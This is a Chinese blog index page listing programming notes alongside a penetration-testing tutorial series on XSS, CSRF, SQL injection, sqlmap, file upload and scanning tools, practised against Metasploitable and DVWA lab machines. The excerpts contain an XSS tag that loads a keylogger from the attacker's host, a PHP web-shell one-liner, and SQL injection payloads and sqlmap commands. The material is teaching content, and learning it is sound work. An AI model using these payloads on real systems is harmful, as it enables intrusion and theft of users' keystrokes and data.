自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(80)
  • 资源 (1)
  • 收藏
  • 关注

原创 【JAVA】本地代码获取路径乱码

本地代码获取路径乱码

2023-04-07 10:57:25 514

原创 Linux服务器上调项目接口

linux服务器上调项目接口

2023-03-03 11:35:03 1086

原创 【JAVA】xxl-job服务搭建

xxl-job服务搭建

2023-02-27 17:21:22 886

原创 【java】java实现pdf根据内容定位插入图片

java实现pdf根据定位插入图片

2022-08-10 16:53:43 1988 2

原创 PLSQL定时任务入门

1.定时任务1.1语法语法:declare job_test number; begin dbms_job.submit(   job_test, --定时器ID,系统自动获得   'p_json2;', --what执行的存储过程名    sysdate, --next_date,定时器开始执行的时间,这里表示立即执行   'sysdate + 1/1440' --interval,每隔1分钟执行一次 ); commit; end;job参数是输出参数,由sub

2021-07-02 18:21:18 4466 1

原创 PLSQL入门(变量,流程控制,游标,存储过程)

PLSQL入门helloworlddeclare #变量的声明 i integer; #方法的开始begin #类似于 java System.out.println('hello world'),put()输出;put_lint()换行输出; Dbms_Output.put_line('hello world!'); #方法结束end;变量PLSQL编程中常见的变量分两大类:1.普通数据类型(char,varcher2,date,number,boolea,long

2021-07-02 17:00:01 924

原创 第十三章—手动漏洞挖掘(十 一)——CSRF

CSRFcsrf——跨站请求伪造从信息的角度来区分:xss:利用用户对站点的信任csfr:利用站点对已经身份认证的用户端的信任1.概述原理:客户端访问服务器端进行登录进行了身份认证,有了一个合法的session,此时如果客户端用户误点击了hack给他的链接这种请求,便会执行请求并把该请求发送给服务器端,而这个请求是利用他现有的合法的session身份来进行提交的,在服务器端看来,该请求有合法的身份验证,便会认为该请求是正常的请求。但是hack也不知道客户端是否点击了该请求,只能等待,如果该请求

2021-04-12 14:38:43 427

原创 第十三章—手动漏洞挖掘(十)——XSS(三)

存储型XSS1. 概述反射型xss和存储型xss的区别是:反射型xss需要一系列的社会工程学等各种欺骗方式诱使别人点击你发送给他的连接地址,利用起来较麻烦。存储型xss漏洞利用之后造成的威胁性更大,利用难度也较容易一些。存储型xss,利用代码长期存储在服务器端。渗透测试者一次性发起漏洞利用代码后,利用代码就会注入到服务器存在漏洞的页面,之后每当有人访问该页面,都会从服务器下载这段攻击性的代码脚本,在本地浏览器中执行。只要渗透测试者攻击后开着主机侦听端口等待有人访问该网页,就会像钓鱼一样上钩,客户端

2021-04-09 15:10:55 1072

原创 第十三章—手动漏洞挖掘(十)——XSS(二)

XSS(二)1.场景:键盘记录器1.1 环境准备#要执行的指令,10.0.0.140是kail这台虚机的ip,我们需要在该虚机上新建一个keylogger.js脚本文件<script src="http://10.0.0.140/keylogger.js"></script>#因为我们要把keylogger.js文件放到apache下,所以在创建keylogger.js脚本文件前,我们需要查询80端口是否被占用netstat -pantu | gerp :80#如果查

2021-04-07 17:06:02 357

原创 第十三章—手动漏洞挖掘(十)——XSS(一)

XSS —— 跨站脚本漏洞xss(cross-site scripting)跨站脚本漏洞,其漏洞还是存在于服务器端,但与之前漏洞不同的是,他攻击的对象不是服务端,他利用漏洞攻击的对象是网站站点的使用者即客户端。原理:一些黑客可以把有恶意的javascript代码注入到服务器上,可能是一次性注入,也可能是持久性注入,服务器端就会吧这些代码不做任何修改直接交付给客户端浏览器,一旦脚本代码存在恶意目的,到达了客户端浏览器去执行的话,就会实现客户端的一个攻击。但是javascript在浏览器中使用权限比较受限

2021-04-02 11:54:53 268

原创 第十三章—手动漏洞挖掘(九)—— Sqlmap自动注入(四)

Sqlmap自动注入(四)

2021-03-26 16:12:47 220

原创 第十三章—手动漏洞挖掘(九)——SQLMAP自动注入(三)

Sqlmap自动注入(三)1.Optimization参数Optimization——优化#相当于把--predict-output、--keep-alive、--null-connection参数都加上了-o #预设的输出。根据检测方法,对比返回值和统计表内容,不断缩小检测范围,提高检测效率,与--threads参数不兼容#可以检测版本号、用户名、密码、privileges、role、数据库名称、表名、列名#find / -name common-outputs.txt查看到统计表文件位置为

2021-03-25 21:25:45 256

原创 第十三章—手动漏洞挖掘(九)——SQLMAP自动注入(二)

sqlmap自动注入(二)—request--data#post方法,原https://1.1.1.1/a.phpsqlmap -u "https://1.1.1.1/a.php" --data="user=1&pass=2" -f#get方法,原 https://1.1.1.1/a.php?user=1&pass=2sqlmap -u "http://1.1.1.1/a.php" --data="user=1&pass=2" -f...

2021-03-25 10:20:24 405 4

原创 第十三章—手动漏洞挖掘(九)——SQLMAP自动注入(一)

sqlmap自动注入(一)

2021-03-11 15:48:33 335

原创 第十三章—手动漏洞挖掘(八)——SQL盲注(三)

sql盲注前面讲的sql注入内容都是基于输入错误的sql语句,服务器会返回数据库内建的报错信息,所以我们可以猜测他的数据库是怎么构造的。当程序员隐藏了数据库内建报错信息,替换为通用的错误提示,sql注入将无法依据报错信息判断注入语句的执行结果,即盲。思路:既然无法基于报错信息判断结果,我们可以基于逻辑真假的不同结果来判断。1' and 1=1-- 1' and 1=2-- 结果为假时,无内容显示。1' order by 5-- 1' order by 2-- 1.有权读取inf

2021-03-08 14:19:31 217 1

原创 第十三章—手动漏洞挖掘(七)——SQL注入(三)

SQL注入(三)一、当数据库不可写前两章讲的,都是基于读取information_schema库,该苦必须是root权限才有读写操作权。如果是一个安全意识很好的运维人员,他有可能创建一个用户权限较低的普通账号来运行mysql数据库实例,此时即使应用存在sql注入漏洞,通过他也无法查询information_schema库,前两章的大多数函数就无法使用了。也有可能存在union、order by语句也无法使用的情况。此时我们就需要尝试其他方法。可以通过sql的逻辑判断进行猜测。该root不是操作系

2021-03-05 10:16:36 249 1

原创 第十三章—手动漏洞挖掘(六)——SQL注入(二)

一、读取文件

2021-03-04 14:14:46 320

原创 第十三章—手动漏洞挖掘(五)——SQL注入(一)

lsb_release -a #查看kail的运行版本SQL注入服务器端程序将用户输入参数作为查询条件,直接拼接sql语句,并将查询结果返回给客户端浏览器。

2021-03-01 16:48:03 485

原创 第十三章—手动漏洞挖掘(四)

文件包含远程文件包含:可以使用kail下的/usr/share/wfuzz/wardlist/vulns下有专门针对类unix或windows系统的目录遍历使用的字典。文件上传漏洞设置DWVA安全级别为low打开DVWA的文件上传功能,正常上传成功效果如下图:现在我们创建一个php文件:<?php echo shell_exec($_GET['cmd']);?>我们尝试上传该php文件。上传成功,我们使用该url进行测试,发现被成功执行:我们使用burpsui

2021-01-19 17:11:07 253

原创 第十三章—手动漏洞挖掘(三)

文件遍历Directory traversal / 文件包含File include目录权限限制不严 / 文件包含环境:metasploitable操作:修改php配置文件,将allow_url_include修改为on,就会允许我们include其他的url地址到webapplication的相关参数里进而执行,从而导致远程文件引用这个漏洞出现。vi /etc/php5/cgi/php.ini#重启apache,重启后,有漏洞的配置才会生效/etc/init.d/apache2 restart

2021-01-19 11:44:50 179

原创 第十三章—手动漏洞挖掘(二)

身份认证面对web application的登录。

2021-01-18 10:48:39 548

原创 第十三章—手动漏洞挖掘(一)

手动漏洞挖掘(一)

2021-01-11 17:15:57 1205

原创 第十三章——Burpsuite三(Repeater、Sequencer、Decoder、Comparer、Options)

BurpsuiteRepeater1.Repeater 使用可以右键将请求发送到repeater:发送到repeater后可以手动修改并点击send进行请求的重复提交。对于凡是有变量的地方,我们都可以修改内容对其进行一个注入,发送请求,根据返回的结果进行判断是否存在某种漏洞。2.数据包右键菜单(1)改变请求方式点击send发送请求后会收到回复。raw:返回原始数据headers:头部分Hex:十六进制的形式显示Html:以Html源码进行显示,不显示头Render:对页面进行渲

2020-09-17 14:33:39 654

原创 第十三章——Burpsuite二(Dashboard、Intruder)

Burpsuitespider

2020-09-16 14:22:45 3090

原创 第十三章——Burpsuite一(安装、proxy、target)

Burpsuiteweb安全工具中的瑞士军刀。Burpsuite是一个强大web漏洞挖掘工具,截断代理,解码和编码,Fuzzy进行各种注入和暴力破解 插件扩展,有多个模块。PortSwigger公司开发,有Burp Free版和Burp Professional版。Free版完全是一个手动漏洞挖掘的工具,没有主动扫描、主动探测漏洞、自动发现漏洞、自动报警漏洞这些。和Professional的区别就是没有主动扫描工具。官方网站:http://www.portswigger.net。所有的工具共享一个

2020-09-14 17:14:50 387

原创 第十三章(三)—WEB渗透(skipfish)

skipfishC语言编写,谷歌开发的一款工具。实验性的主动web安全评估工具。重点关注的是web代码。基于字典对目录探测。优点:速度较快:使用多路单线程,全异步网络I/O,消除内存管理和调度开销;启发式自动内容识别。误报较低skipfish -o 目录 http://1.1.1.1 #-o:扫描结果存放到目录下skipfish -o test @url.txt #url.txt里存放你要扫描的多个文件目标,通过命令一次性调用skipfish -o test -S complet.wl

2020-08-31 15:39:19 245

原创 java后端验证验证码,防绕过

java后端验证验证码前端<form action="<%=contextPath %>/target/targetindex" id="form_submit" method="post"> <input type="password" class="input input-big" name="password" id="password" placeholder="登录密码" /> <input type="t

2020-07-29 11:46:40 1112 1

原创 java修复xss漏洞

JAVA修复XSS漏洞方案一:对于请求中是封装好的对象或者以属性名作为参数的都适用以下解决方案:封装好的对象,如:使用属性名作为参数,如:以/updateRole和/addRole作为例子,这两个方法中都需要对前台输入的参数进行过滤。1.添加过滤器import java.io.IOException;import javax.servlet.Filter;import javax.servlet.FilterChain;import javax.servlet.FilterConf

2020-07-29 11:31:40 2998

原创 第十三章(二)—WEB渗透(扫描工具NIKTO)

1.实验环境metasploitableDVWA下载安装下载地址:https://sourceforge.net/projects/metasploitable/用vm打开.vmsd文件,如果遇见需要配置文件什么的,就用vm打开vmx文件。开启虚拟机,账号密码都是:msfadmin网络配置保证kail和metasploitable两个虚机处在同一个网段。kail:metasploitable:测试一下是否能互相ping通。默认情况下,metasploitable上webap

2020-07-24 11:43:48 608

原创 第十三章(一)—WEB渗透(HTTP协议基础)

WEB攻击面networkosweb serverapp serverweb applicationdatabasebrowserHTTP协议基础明文没有任何内建的机密性安全机制。嗅探或代理截断可查看全部明文信息。https只能提高传输层安全。只是在传输过程中起到加密作用。对于服务器端和应用程度端代码漏洞是没用的。https也是可以被中间人劫持窃取监听的。无状态每一次客户端和服务器端的通信都是独立的过程。web应用需要跟踪客户端会话(多步通信)。不使用cookie

2020-07-23 10:37:08 308

原创 nginx配置二级域名、http转https并映射到tomcat下不同项目

1.安装我使用的是nginx-1.14.2的安装包, nginx-1.14.2.tar.gz# 下载安装包到 src 目录cd /usr/local/srcwget http://nginx.org/download/nginx-1.14.1.tar.gz#解压 nginx-1.14.2.tar.gztar -zxvf java.tar.gz 想要使用nginx的https,就需要配置的时候安装http_ssl_module模块。./configure --prefix=/usr/l

2020-06-22 16:44:05 773

原创 CentOS忘记root密码如何重置密码

重置密码首先,开机在开机读秒的过程中,按e进入如下界面:然后是按e键进入grub模式进入该模式后:移动键盘的方向,到kernel行按e键进入界面:在kernel编辑界面,按一下空格键,然后在后面输入single,同时按下回车键enter退出kernel编辑界面。再次移动到kernel选项上,按b键启动系统,这个时候进入single模式了在下面输入 passwd root 就可以开始重置密码了。passwd root...

2020-06-17 11:03:22 282

原创 第八章(三)—漏洞扫描(openvas)

nmap脚本nmap扫描脚本,默认集成500多个脚本,这些脚本是有分类的,每个脚本所做的工作是不同方面的。/usr/share/nmap/scripts/ #nmap的脚本都在该目录下存放cat script.dbless script.db | grep vuln | wc -l #查看nmap中有多少个关于弱点vuln的脚本每个脚本后面都有一个分类categories,后面的参数内容描述了该脚本属于哪些分类smb-vuln-ms10-061.nse这个脚本是stuxnet蠕虫利

2020-06-05 15:51:39 5671

原创 第八章(二)—漏洞扫描(nmap脚本使用)

nmap脚本nmap扫描脚本,默认集成500多个脚本,这些脚本是有分类的,每个脚本所做的工作是不同方面的。/usr/share/nmap/scripts/ #nmap的脚本都在该目录下存放cat script.dbless script.db | grep vuln | wc -l #查看nmap中有多少个关于弱点vuln的脚本每个脚本后面都有一个分类categories,后面的参数内容描述了该脚本属于哪些分类smb-vuln-ms10-061.nse这个脚本是stuxnet蠕虫利

2020-06-05 15:38:41 8668

原创 第八章(一)—漏洞扫描(基本概念)

基于端口服务扫描结果版本信息(速度慢)搜索已公开的漏洞数据库(数量大)使用弱点扫描器实现漏洞管理

2020-06-01 17:20:35 2185

原创 第七章(十四)—主动信息收集—nmap参数介绍

NMAP1.主机发现相关参数-iL #把不连续的ip存成一个文件做成一个ip地址列表文件,iL后面跟该地址列表文件#如:nmap -iL iplist.txt-iR #随机选择目标,不用指定扫谁,nmap会帮你随机的指定目标去扫谁,后面要跟要扫目标的数量,#如:nmap -iR 10 -p22,即随机扫10个目标--exclude #如果选了一个iP地址段,但有些ip又不想扫,可以使用该参数把不想扫的ip剔除掉#如: nmap 192.168.1.0/24 --exclude 192

2020-05-28 15:24:23 445

原创 第七章(十三)—主动信息收集—WAF识别

WAF识别WEB应用防火墙。Web应用防护系统(Web Application Firewall, 简称:WAF)代表了一类新兴的信息安全技术,用以解决诸如防火墙一类传统设备束手无策的Web应用安全问题。WAF是指通过一系列针对HTTP/HTTP5的安全策略专门为web应用提供保护的产品。它主要用于防御针对网络应用层的攻击,像SQL注入,跨站脚本攻击、参数篡改、应用平台漏洞攻击、拒绝服务攻击等。同传统的防火墙不同的是,web应用防火墙位于两个或多个网络之间,它们是实施网间访问控制的一组组建的集合,内

2020-05-28 11:40:50 376

原创 第七章(十二)—主动信息收集—负载均衡识别

负载均衡识别分为两大类:广域网负载均衡他的原理就是DNS,简单的方法就是使用DNS轮询来进行负载均衡。当你访问一个域名时,同一个域名会被解析成多个A记录解析到多个ip地址上。服务器负载均衡基于web的服务,经常使用的是nginx、apache这种应用层的负载均衡。当然也可以使用一些负载均衡设备去实现。目的:在扫描探测的阶段,我们也有必要发现一下目标域名被解析到多少个服务器,这些歌服务器有可能因为管理员的配置不善,不同的服务器之间他们的安全防护是不一样的,配置也不一样,有的ip可能就会存在

2020-05-28 11:40:34 598

原创 第七章(十一)—主动信息收集—防火墙识别

防火墙识别目的:通过发送的扫描数据包,不引起防火墙的告警,同时还能根据他的回包识别出防火墙上过滤了那些端口。这些过滤的端口就不是在防火墙上开放的端口。

2020-05-28 10:38:27 276

原创 第七章(十)—主动信息收集—SMTP扫描

SMTP扫描SMTP:25端口目的:发现目标系统的邮件账号。初级的方法:nc -nv 1.1.1.1 25 VRFY root #使用该命令去确认是否nmap smtp.163.com -p25 --script=smtp-enum-users.nse --script-args=smtp-enum-users.methods={VRFY}#--script-args=smtp-enum-users.methods=指定使用什么方式做用户账号的枚举smtp-user-enum -M V

2020-05-27 17:35:57 685

http-demo.zip

乐优商城第二天springcloud入门案例讲解中的要导入的代码demo。

2019-10-17

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除